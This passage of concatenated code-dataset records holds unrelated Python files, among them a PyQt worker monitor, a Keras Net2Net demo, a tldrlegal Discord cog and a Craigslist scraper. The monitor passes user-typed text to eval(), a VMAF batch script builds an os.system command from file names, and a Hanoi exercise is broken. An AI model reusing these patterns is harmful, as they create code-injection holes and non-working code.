Qt.QueuedConnection)\n mainSys().tm.WorkersChanged.connect(self.on_ThreadsChanged, Qt.QueuedConnection)\n #mainSys().ProcessLogAdded.connect(self.on_ProcessLogAdded)\n\n\n def GetMode(self):\n \"\"\"Returns M_PROCESS or M_THREAD.\"\"\"\n return self.tabWidget.currentIndex()\n\n def GetCurrentTask(self):\n \"\"\"Returns either a process or a thread, or None.\"\"\"\n return self.currentProcess if self.GetMode() == M_PROCESS \\\n else self.currentThread\n\n ############################################################################\n ## SLOTS\n\n def on_ProcessesChanged(self):\n self.PopulateProcesses()\n\n def on_ThreadsChanged(self):\n self.PopulateThreads()\n\n def on_FileChanged(self, fns):\n fns = self.fileObserver.filenames\n if fns and os.path.exists(fns[0]):\n with file(fns[0]) as f:\n if self.checkBoxTail.isChecked():\n s = misc.tail(f, self.spinBoxTailSize.value())\n else:\n s = f.read()\n else:\n s = \"Nothing to display yet\"\n te = self.textEditLog\n te.setText(s)\n te.moveCursor(QTextCursor.End)\n\n @pyqtSignature(\"\")\n def on_pushButtonRefresh_clicked(self):\n if self.GetMode() == M_PROCESS:\n self.PopulateProcesses()\n else:\n self.PopulateThreads()\n\n @pyqtSignature(\"\")\n def on_pushButtonReload_clicked(self):\n self.on_FileChanged([])\n\n @pyqtSignature(\"\")\n def on_pushButtonPutMessage_clicked(self):\n obj = self.GetCurrentTask()\n if obj is not None:\n try:\n token = str(self.lineEditPToken.text())\n sData = str(self.lineEditPData.text())\n if len(sData) == 0 or sData.isspace():\n data = True\n else:\n data = eval(sData)\n obj.PutMessage(token, data)\n except Exception as E:\n QMessageBox.critical(self, \"Send message\", E.message)\n raise\n else:\n QMessageBox.warning(self, \"No task selected\", \"No process/thread selected\")\n\n @pyqtSignature(\"\")\n def on_pushButtonExit_clicked(self):\n obj = self.GetCurrentTask()\n if obj is not None:\n obj.Exit()\n\n @pyqtSignature(\"QTableWidgetItem*, QTableWidgetItem*\")\n def on_tableWidgetProcess_currentItemChanged(self, curr, prev):\n 
self.UpdateCurrentProcess(curr)\n\n @pyqtSignature(\"QTableWidgetItem*, QTableWidgetItem*\")\n def on_tableWidgetThread_currentItemChanged(self, curr, prev):\n self.UpdateCurrentThread(curr)\n\n @pyqtSignature(\"int\")\n def on_tabWidget_currentChanged(self, index):\n if index == M_PROCESS:\n self.PopulateProcesses()\n else:\n self.PopulateThreads()\n\n def closeEvent(self, event):\n self.fileObserver.Exit()\n\n ############################################################################\n\n def PopulateTableWidget(self, pp, t):\n \"\"\"\n :param pp: list of workers\n :param t: table widget\n \"\"\"\n n = len(pp)\n t.clear()\n t.sortItems(-1)\n t.setRowCount(n)\n t.setColumnCount(3)\n t.setHorizontalHeaderLabels([\"Name\", \"Class\", \"Time registered\"])\n for (i, (worker, data)) in enumerate(pp.iteritems()):\n item = QTableWidgetItem(worker.name)\n t.setItem(i, 0, item)\n item = QTableWidgetItem(worker.__class__.__name__)\n t.setItem(i, 1, item)\n item = QTableWidgetItem(data.timeStarted.strftime(\"%Y/%m/%d %H:%M\"))\n # item.setTextAlignment(Qt.AlignCenter)\n t.setItem(i, 2, item)\n t.resizeColumnsToContents()\n if n > 0:\n t.setCurrentCell(0, 0)\n\n def PopulateProcesses(self):\n pp = mainSys().pm.workerInfoByWorker\n t = self.tableWidgetProcess\n self.PopulateTableWidget(pp, t)\n if len(pp) > 0:\n self.UpdateCurrentProcess()\n\n def PopulateThreads(self):\n tt = mainSys().tm.workerInfoByWorker\n t = self.tableWidgetThread\n self.PopulateTableWidget(tt, t)\n if len(tt) > 0:\n self.UpdateCurrentThread()\n\n def UpdateLogFile(self, curr, monitor, t):\n \"\"\"\n :param curr: I am not sure\n :param monitor: TPMonitor\n :param t: table widget\n\n Returns a worker object or None\n \"\"\"\n if curr is None:\n items = t.selectedItems()\n if len(items) > 0:\n curr = items[0]\n else:\n curr = t.item(curr.row(), 0) # Gets item of first column instead\n if curr is not None:\n name = curr.data(0).toPyObject()\n worker, _ = monitor.worker_GetByName(name)\n self.labelFilename.setText(worker.logFilename)\n self.pushButtonReload.setEnabled(True)\n self.fileObserver.SetFilenames([worker.logFilename])\n self.on_FileChanged([])\n return worker\n return None\n\n def UpdateCurrentProcess(self, curr=None):\n \"\"\"Updates internal and GUI status after current process has changed.\n\n curr is passed from currentItemChanged, because the signal is emitted\n before the item has internally changed.\"\"\"\n t = self.tableWidgetProcess\n monitor = mainSys().pm\n self.currentProcess = self.UpdateLogFile(curr, monitor, t)\n\n def UpdateCurrentThread(self, curr=None):\n \"\"\"Updates internal and GUI status after current Thread has changed.\n\n curr is passed from currentItemChanged, because the signal is emitted\n before the item has internally changed.\"\"\"\n t = self.tableWidgetThread\n monitor = mainSys().tm\n self.currentThread = self.UpdateLogFile(curr, monitor, t)\n","sub_path":"lib/alavan/gui/a_XTPMonitor.py","file_name":"a_XTPMonitor.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160930364","text":"import pickle\nimport json\nimport numpy as np\n\n__model = pickle.load(open(\"./homegram_home_prices_model.pickle\", 'rb'))\n__data_columns = json.load(open(\"./columns.json\"))['data_columns']\n\n# __data_columns = [\"number of rooms\", \"angwan rukuba, jos\", \"bauchi ring road, jos\", \"busa buji street, jos\",\n# \"farin gada road, jos\", \"jos terminus, ahmadu bello way, jos\", \"lamingo road, jos\",\n# 
\"old airport road, jos\", \"rayfield road, jos\", \"rock haven street, jos\"]\n__locations = __data_columns[1:]\n\n\ndef get_estimated_price(location, noOfRooms):\n try:\n loc_index = __data_columns.index(location.lower())\n except:\n loc_index = -1\n\n x = np.zeros(len(__data_columns))\n x[0] = noOfRooms\n if loc_index >= 0:\n x[loc_index] = 1\n\n return round(__model.predict([x])[0])\n\ndef get_location_names():\n return __locations\n\ndef load_saved_artifacts():\n print('Loading saved Artifacts...start')\n global __data_columns\n global __locations\n\n # __data_columns = json.load(open(\"./columns.json\"))['data_columns']\n __data_columns = [\"number of rooms\", \"angwan rukuba, jos\", \"bauchi ring road, jos\", \"busa buji street, jos\", \"farin gada road, jos\", \"jos terminus, ahmadu bello way, jos\", \"lamingo road, jos\", \"old airport road, jos\", \"rayfield road, jos\", \"rock haven street, jos\"]\n __locations = __data_columns[1:]\n global __model\n __model = pickle.load(open(\"./homegram_home_prices_model.pickle\", 'rb'))\n print(\"loading saved artifacts...done\")\n\nif __name__ == '__main__':\n print(get_location_names())\n print(get_estimated_price(\"bauchi ring road, jos\", 3))","sub_path":"code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"384276598","text":"\n\nimport subprocess\nimport os\n\n\n#./run_vmaf yuv420p 3840 2048 \\\n# /media/moc/Data1/u/moc/TFM/QP_TESTS/collection/aux/output/IrishCow_3840x2048/QP_TEST/IrishCow_3840x2048.yuv \\\n# /media/moc/Data1/u/moc/TFM/QP_TESTS/collection/aux/output/IrishCow_3840x2048/QP_TEST/vmaf_test/yuv/IrishCow_3840x2048_QP_10_00:00:29.yuv \\\n\n#./ffmpeg2vmaf width height reference_path distorted_path [--out-fmt output_format --ci]\n\n'''\nNEW VQMT VERSION\nhttps://github.com/lvchigo/VQMT\n./vqmt /media/moc/Data/moc/AAVP/test_ts2png/reference_done/Lions_3840x1920_00_00_18_noaudio.yuv \n/media/moc/Alcachofa/moc/METRICS_EXPERIMENT/test/Lions_3840x1920_00_00_18_QP_48.yuv \n3840 1920 230 1 /media/moc/Data/moc/AAVP/pruebita SSIM MSSSIM\n\n'''\n\ndef doIt():\n ################################ SOURCE\n dir_orig = '/media/mcl/Maxtor/mcl/LIVE/video_original/'\n #file_orig ='IrishCow_3840x2048.yuv'\n width = '1280'\n height = '720'\n\n\n ############################### TEST\n dir_out = '/home/mcl/metricas_objetivas/'\n dir_test = '/media/mcl/Maxtor/mcl/LIVE/video/'\n\n\n\n\n\n for file in os.listdir(dir_orig):\n if file.endswith(\".yuv\"):\n content = os.path.splitext(file)[0]\n print(file)\n name = (content.strip().split('_'))[0] #+ '_' + (content.strip().split('_'))[1]\n print(name)\n #print('SOURCE NAME', name)\n\n for file2 in os.listdir(dir_test):\n if file2.endswith(\".yuv\"):\n content2 = os.path.splitext(file2)[0]\n #print(content2)\n filenames_txt = dir_out + content2 + '_run_vmqt.sh'\n name2 = (content2.strip().split('_'))[0] #+ '_' + (content2.strip().split('_'))[1]\n print(name2)\n #results_name = (content2.strip().split('_'))[0] + '_' + (content2.strip().split('_'))[1] + '_' + (content2.strip().split('_'))[2]\n #print('CODIFIED NAME', (content2.strip().split('_'))[0] + '_' + (content2.strip().split('_'))[1] + '_' + (content2.strip().split('_'))[2])\n if name == name2:\n print('trueeeeeeeeeeeee')\n os.system('echo yuv420p 1280 720 ' + dir_orig + file + ' ' + dir_test + file2 + ' >> 
videos_pa_vmafbatch_LIVE.txt')\n\n\n\n\ndoIt();","sub_path":"QualityMetrics/python/run_vmaf.py","file_name":"run_vmaf.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"549076036","text":"from tkinter import *\n\nroot = Tk()\n\ntextLabel = Label(root,\n text='您所下載的影片含有未成人限制內容,請滿18周歲後再點擊觀看!',\n justify=LEFT,\n padx=10)\ntextLabel.pack(side=LEFT)\n\nphoto = PhotoImage(file='imgs/18-stop.png')\nimgLabel = Label(root, image=photo)\nimgLabel.pack(side=RIGHT)\n\nmainloop()\n","sub_path":"tkinter/tk3.py","file_name":"tk3.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"613031484","text":"'''\nReplace NEWLAYERS with different layer you would like to use to expand\nyour network.\n\nParameters:\n insert_pos - index of the newly inserted layer\n layers - a list of layers to be inserted\n\nExample to insert a FC layer:\n NEWLAYERS = {'insert_pos': 8,\n 'layers': [Dense(128)]}\nExample to insert a Conv layer:\n NEWLAYERS = {'insert_pos': 2,\n 'layers': [Activation('relu'),\n Convolution2D(NB_FILTERS, NB_CONV, NB_CONV),\n ZeroPadding2D((1, 1))]}\n\nPadding is required to keep the size of the convolutional layers the same\nbefore and after the expansion.\n'''\n\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\nimport os.path\nimport argparse\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import ZeroPadding2D\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.models import model_from_json\nfrom net2net import Net2Net\n\n\nIMGROWS, IMGCOLS = 28, 28\nNB_CLASSES = 10\nNB_FILTERS = 32\nNB_POOL = 2\nNB_CONV = 3\n\nNEWLAYERS = {'insert_pos': 2,\n 'layers': [Activation('relu'),\n Convolution2D(NB_FILTERS, NB_CONV, NB_CONV),\n ZeroPadding2D((1, 1))]}\n\n\ndef prepare_mnist_data():\n '''Ger MNIST data'''\n\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n X_train = X_train.reshape(X_train.shape[0], 1, IMGROWS, IMGCOLS)\n X_test = X_test.reshape(X_test.shape[0], 1, IMGROWS, IMGCOLS)\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n X_train /= 255\n X_test /= 255\n print('X_train shape:', X_train.shape)\n print(X_train.shape[0], 'train samples')\n print(X_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, NB_CLASSES)\n Y_test = np_utils.to_categorical(y_test, NB_CLASSES)\n\n return X_train, X_test, Y_train, Y_test\n\n\ndef create_model(insert=None):\n '''Create the basic model'''\n\n model = Sequential()\n\n layers = [Convolution2D(NB_FILTERS, NB_CONV, NB_CONV,\n border_mode='valid',\n input_shape=(1, IMGROWS, IMGCOLS)),\n Activation('relu'),\n MaxPooling2D(pool_size=(NB_POOL, NB_POOL)),\n Dropout(0.25),\n Flatten(),\n Dense(128),\n Activation('relu'),\n Dropout(0.5),\n Dense(NB_CLASSES),\n Activation('softmax')]\n\n if insert is not None:\n for l in insert['layers']:\n layers.insert(insert['insert_pos'], l)\n\n for layer in layers:\n model.add(layer)\n\n return model\n\n\ndef is_dense(layer):\n '''Check if the layer is dense (fully connected)'''\n\n ltype = layer.get_config()['name'].split('_')[0]\n if ltype == 'dense':\n return True\n return False\n\n\ndef 
is_convolutional(layer):\n '''Check if the layer is convolutional'''\n\n ltype = layer.get_config()['name'].split('_')[0]\n if ltype.find('convolution') > -1:\n return True\n return False\n\n\ndef find_ref_layer_idx(layers):\n '''\n Find the index of the reference layer. It looks for Conv or FC\n layer from (insert_pos - 1) to 0 of the ori_layers list and return\n the index of the found layer\n '''\n\n insert_pos = NEWLAYERS['insert_pos']\n for i in range(1, insert_pos + 1):\n ref_layer = layers[insert_pos - i]\n if is_convolutional(ref_layer) or is_dense(ref_layer):\n return insert_pos - i\n\n\ndef find_major_layer_idx():\n '''Looking for the Conv or FC layer in NEWLAYERS['layers']'''\n\n for i in range(0, len(NEWLAYERS['layers'])):\n layer = NEWLAYERS['layers'][i]\n if is_convolutional(layer) or is_dense(layer):\n return i\n return -1\n\n\ndef get_deeper_weights(ref_layer):\n '''\n To calculate new weights to make the net deeper using Net2Net class,\n one needs to swap the axes for the right order.\n Dim of Keras conv layer: (OutChannel, InChannel, kH, kW)\n conv layer Net2Net class accepts: (kH, kW, InChannel, OutChannel)\n '''\n parms = ref_layer.get_weights()\n n2n = Net2Net()\n if is_convolutional(ref_layer):\n weights = parms[0].swapaxes(0, 2).swapaxes(1, 3).swapaxes(2, 3)\n new_w, new_b = n2n.deeper(weights, True)\n new_w = new_w.swapaxes(0, 2).swapaxes(1, 3)\n else:\n weights = parms[0]\n new_w, new_b = n2n.deeper(weights, True)\n return new_w, new_b\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Demo Net2Net on MNIST dataset\"\n )\n\n parser.add_argument(\n \"-r\", \"--retrain\", default=False, action='store_true',\n help=\"To re-train and generate mnist_cnn.h5\"\n )\n parser.add_argument(\n \"--loss\", default=\"categorical_crossentropy\", type=str,\n help=\"Define loss function (default: categorical_crossentropy)\"\n )\n parser.add_argument(\n \"--optimizer\", default=\"adadelta\", type=str,\n help=\"Define optimizer (default: adadelta)\"\n )\n parser.add_argument(\n \"--weights\", default=\"./mnist_cnn.h5\", type=str,\n help=\"Path to the weight file (default: ./mnist_cnn.h5)\"\n )\n parser.add_argument(\n \"--batch-size\", type=int, default=128, dest='size',\n help=\"Define batch size (default: 128).\"\n )\n parser.add_argument(\n \"--epochs\", type=int, default=12,\n help=\"Define number of epochs (default: 12).\"\n )\n\n args = parser.parse_args()\n\n X_train, X_test, Y_train, Y_test = prepare_mnist_data()\n\n ori_model = create_model()\n ori_model.summary()\n if args.retrain or not os.path.exists(args.weights):\n print('Training the original model and save weights to %s'\n % args.weights)\n ori_model.compile(loss=args.loss,\n optimizer=args.optimizer,\n metrics=['accuracy'])\n\n ori_model.fit(\n X_train, Y_train, batch_size=args.size, nb_epoch=args.epochs,\n verbose=1, validation_data=(X_test, Y_test))\n ori_model.save_weights(args.weights, overwrite=True)\n\n ori_model.load_weights(args.weights)\n ori_layers = ori_model.layers\n\n model = create_model(insert=NEWLAYERS)\n model.summary()\n i = find_ref_layer_idx(ori_layers)\n\n # Layers such as ZeroPadding2D or Activation gets no weights\n shift = find_major_layer_idx()\n shift = 0 if shift < 0 else shift\n\n new_w, new_b = get_deeper_weights(ori_layers[i])\n\n n_new_layers = len(NEWLAYERS['layers'])\n for j in range(0, len(ori_layers)):\n if j <= i:\n parm = ori_layers[j].get_weights()\n model.layers[j].set_weights(parm)\n elif j == i + NEWLAYERS['insert_pos'] + shift:\n 
model.layers[j].set_weights([new_w, new_b])\n elif j > i + n_new_layers:\n parm = ori_layers[j - n_new_layers].get_weights()\n model.layers[j].set_weights(parm)\n\n model.compile(loss=args.loss,\n optimizer=args.optimizer,\n metrics=['accuracy'])\n\n model.fit(X_train, Y_train, batch_size=args.size, nb_epoch=args.epochs,\n verbose=1, validation_data=(X_test, Y_test))\n score = model.evaluate(X_test, Y_test, verbose=0)\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n\nif __name__ == '__main__':\n main()\n","sub_path":"mnist_net2net.py","file_name":"mnist_net2net.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"635537939","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\"\"\"\nUses webscraping to search tldrlegal for human-readable information on\nsoftware licenses, et cetera.\n\n===\n\nMIT License\n\nCopyright (c) 2018 Neko404NotFound\n\nPermission is hereby granted, free of charge, to any person obtaining\na copy of this software and associated documentation files (the\n\"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be\nincluded in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\nLIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nfrom typing import List, Tuple\n\nimport bs4\nfrom dataclasses import dataclass\nimport discord\n\nfrom discomaton import option_picker\nfrom neko2.shared import alg, commands, string, traits\n\nbase_url = 'https://tldrlegal.com/'\n\n\n@dataclass()\nclass License:\n name: str\n brief: str\n can: List[Tuple[str, str]]\n cant: List[Tuple[str, str]]\n must: List[Tuple[str, str]]\n url: str\n\n\nclass TldrLegalCog(traits.CogTraits):\n @staticmethod\n def get_results_from_html(html: str) -> List[Tuple[str, str]]:\n \"\"\"\n Parses the given HTML as search results for TLDR legal, returning\n a list of tuples for each result: each tuple has the name and URL.\n \"\"\"\n soup = bs4.BeautifulSoup(html)\n\n results = soup.find_all(attrs={'class': 'search-result flatbox'})\n\n pages = []\n\n for result in results:\n link: bs4.Tag = result.find(name='a')\n url = f'{base_url}{link[\"href\"]}'\n name = link.text\n pages.append((name, url))\n\n return pages\n\n @staticmethod\n def get_license_info(url: str, html: str) -> License:\n \"\"\"\n Parses a license info page to get the info regarding said license as an\n object.\n \"\"\"\n soup = bs4.BeautifulSoup(html)\n\n name = soup.find(name='h1', attrs={'class': 'page-title'}).text\n summary = soup.find(name='div', attrs={'class': 'summary-content'})\n summary = summary.text.strip()\n\n # Get the results license-root div.\n results = soup.find(name='div', attrs={'id': 'license_root'})\n\n can_tag = results.find(name='ul', attrs={'class': 'bucket-list green'})\n 
cant_tag = results.find(name='ul', attrs={'class': 'bucket-list red'})\n must_tag = results.find(name='ul', attrs={'class': 'bucket-list blue'})\n\n def remove_title_li(tag: bs4.Tag):\n # Pop the title\n tag.find(name='li', attrs={'class': 'list-header'}).extract()\n\n remove_title_li(can_tag)\n remove_title_li(cant_tag)\n remove_title_li(must_tag)\n\n def get_head_body_pairs(tag: bs4.Tag):\n return (\n tag.find(attrs={'class': 'attr-head'}).text,\n tag.find(attrs={'class': 'attr-body'}).text)\n\n can = [get_head_body_pairs(li) for li in can_tag.find_all(name='li')]\n cant = [get_head_body_pairs(li) for li in cant_tag.find_all(name='li')]\n must = [get_head_body_pairs(li) for li in must_tag.find_all(name='li')]\n\n return License(name, summary, can, cant, must, url)\n\n @commands.probably_broken\n @commands.group(brief='Search for license info on tldrlegal.',\n aliases=['license', 'licence'],\n invoke_without_command=True)\n async def tldrlegal(self, ctx, *, search):\n await self.tldrlegal_logic(ctx, search, False)\n\n @commands.probably_broken\n @tldrlegal.command(brief='Search for a license on tldrlegal, and give '\n 'more information in the results.')\n async def more(self, ctx, *, search):\n await self.tldrlegal_logic(ctx, search, True)\n\n async def tldrlegal_logic(self, ctx, query, verbose):\n \"\"\"\n Helper to prevent code duplication.\n \"\"\"\n http = await self.acquire_http()\n\n # Get search results\n async with http.get(f'{base_url}search', params={'q': query}) as resp:\n if resp.status != 200:\n return await ctx.send(f'tldrlegal said {resp.reason!r}')\n\n results = self.get_results_from_html(await resp.text())\n\n count = len(results)\n\n if count == 0:\n return await ctx.send('Nothing was found.', delete_after=15)\n elif count == 1:\n # Get the URL\n page = results[0]\n else:\n page = await option_picker(\n ctx,\n *results,\n option_formatter=lambda o: o[0].replace('*', '∗')\n )\n\n if page is None:\n return await ctx.send('Took too long...')\n\n # Get the info into an object.\n async with http.get(page[1]) as resp:\n if resp.status != 200:\n return await ctx.send(f'tldrlegal said {resp.reason!r}')\n license_info = self.get_license_info(page[1], await resp.text())\n\n # Generate embed and send.\n embed = discord.Embed(title=license_info.name,\n description=string.trunc(license_info.brief),\n colour=alg.rand_colour(),\n url=license_info.url)\n embed.set_footer(text='Disclaimer: This is only a short summary of the'\n ' Full Text. 
No information on TLDRLegal is'\n ' legal advice.')\n\n def fmt(prs):\n if verbose:\n s = string.trunc('\\n'.join(f'**{n}** {d}' for n, d in prs),\n 1024)\n else:\n s = string.trunc('\\n'.join(f'- {n}' for n, _ in prs),\n 1024)\n\n # Prevents errors for empty bodies.\n return s or '—'\n\n embed.add_field(name='__CAN__', value=fmt(license_info.can),\n inline=not verbose)\n embed.add_field(name='__CANNOT__', value=fmt(license_info.cant),\n inline=not verbose)\n embed.add_field(name='__MUST__', value=fmt(license_info.must),\n inline=not verbose)\n\n if not verbose:\n embed.add_field(name='\\u200b',\n value='_Run again using `tldrlegal more ` '\n 'to get a longer explanation!_')\n\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(TldrLegalCog())\n","sub_path":"neko2/cogs/tldrlegal.py","file_name":"tldrlegal.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"363039453","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nImage Exposure Value Computation\n================================\n\nDefines image exposure value computation objects:\n\n- :func:`exposure_value`\n- :func:`adjust_exposure`\n- :func:`average_luminance`\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport numpy as np\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2015-2017 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['exposure_value',\n 'adjust_exposure',\n 'average_luminance']\n\n\ndef exposure_value(f_number, exposure_time, iso):\n \"\"\"\n Computes the exposure value from given image *FNumber*, *Exposure Time* and\n *ISO* values.\n\n Parameters\n ----------\n f_number : array_like\n Image *FNumber*.\n exposure_time : array_like\n Image *Exposure Time*.\n iso : array_like\n Image *ISO*.\n\n Returns\n -------\n ndarray\n Image exposure value.\n\n Examples\n --------\n >>> exposure_value(8, 1, 100)\n 6.0\n \"\"\"\n\n N = np.asarray(f_number)\n t = np.asarray(exposure_time)\n S = np.asarray(iso)\n\n EV = np.log2(N ** 2) + np.log2(1 / t) - np.log2(100 / S)\n\n return EV\n\n\ndef adjust_exposure(a, EV):\n \"\"\"\n Adjusts given array exposure using given :math:`EV` exposure value.\n\n Parameters\n ----------\n a : array_like\n Array to adjust the exposure.\n EV : numeric\n Exposure adjustment value.\n\n Returns\n -------\n ndarray\n Exposure adjusted array.\n\n Examples\n --------\n >>> adjust_exposure(np.array([0.25, 0.5, 0.75, 1]), 1)\n array([ 0.5, 1. , 1.5, 2. ])\n \"\"\"\n\n a = np.asarray(a)\n\n return a * pow(2, EV)\n\n\ndef average_luminance(f_number, exposure_time, iso, k=12.5):\n \"\"\"\n Computes the average luminance from given image *FNumber*, *Exposure Time*\n and *ISO* values.\n\n Parameters\n ----------\n f_number : array_like\n Image *FNumber*.\n exposure_time : array_like\n Image *Exposure Time*.\n iso : array_like\n Image *ISO*.\n k : numeric, optional\n Reflected light calibration constant :math:`K`.\n\n Returns\n -------\n ndarray\n Image average luminance.\n\n References\n ----------\n .. [1] Wikipedia. (n.d.). 
EV as a measure of luminance and illuminance.\n Retrieved November 14, 2015,\n from https://en.wikipedia.org/wiki/\\\nExposure_value#EV_as_a_measure_of_luminance_and_illuminance\n\n Examples\n --------\n >>> average_luminance(8, 1, 100)\n 0.125\n \"\"\"\n\n N = np.asarray(f_number)\n t = np.asarray(exposure_time)\n S = np.asarray(iso)\n\n L = (S * t) / (k * N ** 2)\n\n return L\n","sub_path":"colour_hdri/utilities/exposure.py","file_name":"exposure.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"245192782","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView, ListView\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nclass IndexView(ListView):\n template_name = \"index.html\"\n\n def get_queryset(self):\n pass\n\n def get_context_data(self):\n context = super().get_context_data()\n if self.request.GET:\n base = \"https://{}.craigslist.org{}\"\n craigslist = \"https://{}.craigslist.org/search/cto?query=-volkswagen+-vw+-impala+-mercedes+-bmw+-audi+-cts+-iq+-fiesta+-versa+-spark+-maxima+-leaf+-saturn+-tl+-infiniti+-mercury+-frs+-jaguar+-chrysler+-lincoln+-fiat&&auto_title_status=1&auto_title_status=5&bundleDuplicates=1&auto_make_model={}&min_auto_year={}&max_auto_miles={}&min_price=6000&max_price={}\"\n data = requests.get(craigslist.format(self.request.GET.get('city'), self.request.GET.get('car'), self.request.GET.get('year'), self.request.GET.get('miles'), self.request.GET.get('price')))\n souper = BeautifulSoup(data.text, \"html.parser\")\n # Get all result list items\n p_results = souper.findAll(\"p\", {\"class\":\"result-info\"})\n p_list = [p for p in p_results]\n abstract_list = [tag.contents[5].string for tag in p_list]\n price_list = [tag.contents[7].span.string for tag in p_list]\n href_list = [tag.contents[5].get(\"href\") for tag in p_list]\n city_list = [tag.contents[7].find(\"span\", {\"class\":\"result-hood\"}) for tag in p_list]\n\n # Iterate over href's & get more info off indidviual pages\n city = self.request.GET.get('city')\n meta_list = []\n for href in href_list:\n detail = requests.get(base.format(city, href))\n detail_soup = BeautifulSoup(detail.text, \"html.parser\")\n meta_results = detail_soup.find_all(\"b\")\n b_list = [b.contents for b in meta_results]\n\n meta_results2 = detail_soup.find_all(\"p\", {\"class\":\"attrgroup\"})\n results_list = [p for p in meta_results2]\n\n meta_list.append(meta_results)\n # meta_list2 = [tag for tag in meta_list]\n\n\n # All info combined in list of tuples\n big_list = [(tag.contents[7].span.string, tag.contents[5].string, tag.contents[5].get(\"href\")) for tag in p_list]\n # Context returned to Template\n context['meta_list'] = meta_list\n context['city'] = self.request.GET.get('city')\n context['price_list'] = price_list\n context['abstract_list'] = abstract_list\n context['big_list'] = big_list\n # print(big_list)\n # print(b_list)\n return context\n","sub_path":"scraping_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"312418574","text":"\n\n#Werte von 1-n in die Anfangsliste einfügen\nneun = n\nA=[]\nif neun>0:\t\t\n\tA.append(neun)\n\tneun = neun-1\n\tprint (A)\n\ndef hanoi( n, A, H, Z):\n\t\n#python keeps track of the disks on the three stacks it opens for the function\n\n\tif n>0:\n\t\thanoi((n-1), A, Z, H)\t\n\t\tdef verschiebe(A, 
Z):\n\t\t\tif Z==[] or A[-1] < Z[-1]:\n\t\t\t\tlast= A.pop()\n\t\t\t\tprint (A)\n\t\t\t\tZ.append(last)\n\t\t\t\tprint(\"nach dem Zug sieht die Ursprungsliste so aus: \", A, \"und die Zielliste so aus: \", Z)\t\n\t\t\telse:\n\t\t\t\tprint(\"falsche EIngabe\")\n\t\tverschiebe(A, Z)\n\t\thanoi((n-1), H, A, Z)\n\telse:\n\t\treturn A, Z, H\n\t\t\n\n\t\t\n\n\t\n\"\"\"\n\t\ndef hanoi(n, source, helper, target):\n if n > 0:\n # move tower of size n - 1 to helper:\n hanoi(n - 1, source, target, helper)\n # move disk from source peg to target peg\n if source:\n target.append(source.pop())\n print(\"Die Scheibe wird von \" , source, \"nach\", target, \"verschoben\")\n # move tower of size n-1 from helper to target\n hanoi(n - 1, helper, source, target)\n \nsource = [3,2,1]\ntarget = []\nhelper = []\nhanoi(len(source),source,helper,target)\n\nprint (source, helper, target)\n\"\"\"\n","sub_path":"U04/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"448374375","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## nbsocket factory\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2015 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n## Python modules\nfrom __future__ import with_statement\nimport logging\nimport time\nfrom threading import RLock\n## NOC modules\nfrom noc.lib.debug import error_report\nfrom exceptions import get_socket_error\nfrom listentcpsocket import ListenTCPSocket\nfrom 